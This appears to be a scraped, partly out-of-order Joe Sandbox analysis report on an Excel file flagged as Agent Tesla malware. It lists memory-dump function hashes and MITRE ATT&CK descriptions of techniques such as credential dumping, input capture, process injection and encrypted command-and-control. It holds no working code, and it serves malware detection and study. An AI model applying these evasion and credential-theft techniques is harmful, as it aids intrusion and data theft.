Function 00CA3698, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a692ff3416a06268173ab2983e521b1059f0e4565b8d645849ded90ecc29202c
Instruction ID: 673808e88ea59dd55116ff82abba8fa775a696dc53015b5ad9a4e8a60fcbb4e3
Opcode Fuzzy Hash: a692ff3416a06268173ab2983e521b1059f0e4565b8d645849ded90ecc29202c
Instruction Fuzzy Hash: DC218E70E002498FCB04CFAAC89499EFBFAFF89324F55C56AE518E7251C7309945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA06DD, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d906d64844996fb228358dab157cac93c7b00e42923d85ba60d9e4367c5d837
Instruction ID: b1d831de6b9d0aba7c47e5391bf1cc195e32d570f3f5ea857afb9cefb512e24b
Opcode Fuzzy Hash: 4d906d64844996fb228358dab157cac93c7b00e42923d85ba60d9e4367c5d837
Instruction Fuzzy Hash: 08317274D002298FCBA4DF29C895699B7F1BB49300F11C1A9D48DA7315DF319E858F91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1E78, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b445d98c399d3d84f7af0b942ec078e6a176479af164525cc8b5f9b21d9adf87
Instruction ID: 5f9a084ca890ddff01799bd5f5e581dd2b493e055fe35a8593374e098af2b99b
Opcode Fuzzy Hash: b445d98c399d3d84f7af0b942ec078e6a176479af164525cc8b5f9b21d9adf87
Instruction Fuzzy Hash: 98310831C18B1A8ACB10EB68C8505E9F7B0FF95300F11D79AE4992B161FF30AAD4CB81

Uniqueness

Uniqueness Score: -1.00%

Function 002BD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2367996104.00000000002BD000.00000040.00000001.sdmp, Offset: 002BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0dd16a50eff75cdb94bc48386a16935383a6750b40566c662b14c24b44c2d16
Instruction ID: 2477257f96958663bddd6d12090e54291110c792c6339e62f4120df7247622c7
Opcode Fuzzy Hash: e0dd16a50eff75cdb94bc48386a16935383a6750b40566c662b14c24b44c2d16
Instruction Fuzzy Hash: 74217F754083809FCB02DF24D994B55BFB1EB46314F28C5EAD8498B266D33A981ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 002AD49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2367983363.00000000002AD000.00000040.00000001.sdmp, Offset: 002AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e980022154ab6591bee8661a65039797566f1f462bd756eda3a8fe93ccfbc6ab
Instruction ID: e31c3f88b7e639ace1a5fbb9d105f5c3ae3f41061199c8c70ae77250bb42d24c
Opcode Fuzzy Hash: e980022154ab6591bee8661a65039797566f1f462bd756eda3a8fe93ccfbc6ab
Instruction Fuzzy Hash: 8211D376804240CFCF12CF14D5C4B16BF71FB85324F24C5A9D8050B616C336D966CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD4F8, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c20bf9ac251032778ea9bddb520d34da3a8f451d7774ce56d856c6af6bcac0d5
Instruction ID: c3246c65466f164056815c3e64b87f0c3ff307693476a8b0db7abbe5d30ac9ac
Opcode Fuzzy Hash: c20bf9ac251032778ea9bddb520d34da3a8f451d7774ce56d856c6af6bcac0d5
Instruction Fuzzy Hash: A7113075F041159F8F40EBB9D84099E77F6ABCD218B108539D21AEB344EE34AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CAFC00, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c560456ecf72d2c1c07da62691934d4c782adc549ed6da429aea869318fa4c2a
Instruction ID: 71049c3245f8cbf9b4d398bd9838c0ab197c468ec7481728324828bb6bf857c3
Opcode Fuzzy Hash: c560456ecf72d2c1c07da62691934d4c782adc549ed6da429aea869318fa4c2a
Instruction Fuzzy Hash: FF113C74F041198F8F90EBB9D85099EB7F6AFC9218B108539D619EB354EB34AD028B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CAC580, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb6f902e660fadc4025311c02959e289737bc20001edcbbcc22803af57aa906
Instruction ID: bd8930ff23508600f9edf74d08668dbb21f0d4212e67329814c14f60b301c009
Opcode Fuzzy Hash: 6fb6f902e660fadc4025311c02959e289737bc20001edcbbcc22803af57aa906
Instruction Fuzzy Hash: 00113C74F001199F8F80EBB9D85099EB7F6ABC92187108439D21AEB344EE34AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE938, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30949a3d83e996b42adad71a3c7bc3ab43ef1b3934d13e7c6e0b0b44c2255a57
Instruction ID: b1ac40d8f17e0b9fccd16ccfba9e9e0f9dc83f7a3809e9c50b82b05f3089d8ff
Opcode Fuzzy Hash: 30949a3d83e996b42adad71a3c7bc3ab43ef1b3934d13e7c6e0b0b44c2255a57
Instruction Fuzzy Hash: CD113075F101199F8F80EBB9D85099F77F6ABCD618B108439D219EB354EA34AD018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 002BE66F, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2367996104.00000000002BD000.00000040.00000001.sdmp, Offset: 002BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d853270eadad65f717b2962ab187c60c632e6650db00fef84f18f46f5932069d
Instruction ID: bc60663b53ee112a385e1fe4ec2fac39383c57ce099f4d4a52f80626cbab56ba
Opcode Fuzzy Hash: d853270eadad65f717b2962ab187c60c632e6650db00fef84f18f46f5932069d
Instruction Fuzzy Hash: D111BB79504280CFCB01CF10D5C4B55FBA1FB85314F28C6A9D8494B656C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CAC350, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d80030e1110eb2b7ac47d7afd1da69ff1553a96379c733fe5e1f2e1b900a1d
Instruction ID: 4f0b6fbb6b7976b3946cad27a0347dbc438dcc8f0438d8409edaff4a2653aec4
Opcode Fuzzy Hash: a2d80030e1110eb2b7ac47d7afd1da69ff1553a96379c733fe5e1f2e1b900a1d
Instruction Fuzzy Hash: 4111B3B5D112199FCB10CF9AD884ADEFFB8FB49314F10852AE918B7200C374AA54CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CA39C8, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723b134bf37076e17492bdf12aa02261f731eb686ac754449285f3c160518356
Instruction ID: bd2ce55c23584c9c8231d2cacfd41333d22383b9df061525422991f24e6d304b
Opcode Fuzzy Hash: 723b134bf37076e17492bdf12aa02261f731eb686ac754449285f3c160518356
Instruction Fuzzy Hash: 130147247003444BE7149BBA4C2176F6987EBC6758F258224A12B9F2D2CF789E025392

Uniqueness

Uniqueness Score: -1.00%

Function 002AD931, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2367983363.00000000002AD000.00000040.00000001.sdmp, Offset: 002AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 719f61df9a2e181ac30125fd12b9e4b5947fca5debf70a4759899e9769c2c308
Instruction ID: b950c557c43e3e2333238e083dc9593aa8e61cf9a35f628e733945f8eab3704f
Opcode Fuzzy Hash: 719f61df9a2e181ac30125fd12b9e4b5947fca5debf70a4759899e9769c2c308
Instruction Fuzzy Hash: 2A01A771018345DBDB208E65C8C47ABFBDCEF82724F18841ADD4A5A686C778DC44C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3A21, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0cc57dbfc3e8e55bae699155e50bbb0d25ef35797a8c58d1e723c591533029
Instruction ID: 38c3fa04249bffb15f9afbbb6667246b3c2a0f5c9739bac2a19320133faf5195
Opcode Fuzzy Hash: ae0cc57dbfc3e8e55bae699155e50bbb0d25ef35797a8c58d1e723c591533029
Instruction Fuzzy Hash: 7201F2307006445BE7149BB98C2176F7A93EFC6758F188164E21A9F2C6CF34AC029352

Uniqueness

Uniqueness Score: -1.00%

Function 002AD930, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2367983363.00000000002AD000.00000040.00000001.sdmp, Offset: 002AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3d3efc055bb724e3e2285e87b8f60dfc52b1778b8e46480010516001b92fd4
Instruction ID: 5009a5b2b3fa7552bdc03d3a30437bf526b6de5b0ca91d45a07f54168e9b9b8b
Opcode Fuzzy Hash: bd3d3efc055bb724e3e2285e87b8f60dfc52b1778b8e46480010516001b92fd4
Instruction Fuzzy Hash: 5CF062714042449BEB148E15CCC8B67FFD8EB92724F18C45AED495B686C3789C44CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3CF0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2da8ffaf93c08a10ff62564160f5ebabd7f6597ee696748a8b71a3fa16077449
Instruction ID: ae253c9bd9670125038e8f1a8f4460c006fa4777e1f915eba4dbfbab55bba25b
Opcode Fuzzy Hash: 2da8ffaf93c08a10ff62564160f5ebabd7f6597ee696748a8b71a3fa16077449
Instruction Fuzzy Hash: 76F06D75A0000A9FDB04CB59D884EAAB7BAFBC8724F04C291F404D7215C230DD81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1FAC, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f86ec04556c5caf40ff522deb0ca7460791444db32749ae2a6ede43811db5eef
Instruction ID: 7e0de2bff2c91abbf06f6930569ed3abfad09297a5591b768ff62c68a2c877db
Opcode Fuzzy Hash: f86ec04556c5caf40ff522deb0ca7460791444db32749ae2a6ede43811db5eef
Instruction Fuzzy Hash: 51D09531D04152DFC31542A8DC051687F6477E3318F1CC55C6448C6028D7100F057710

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 0AX4532QWSA.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "0AX4532QWSA.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre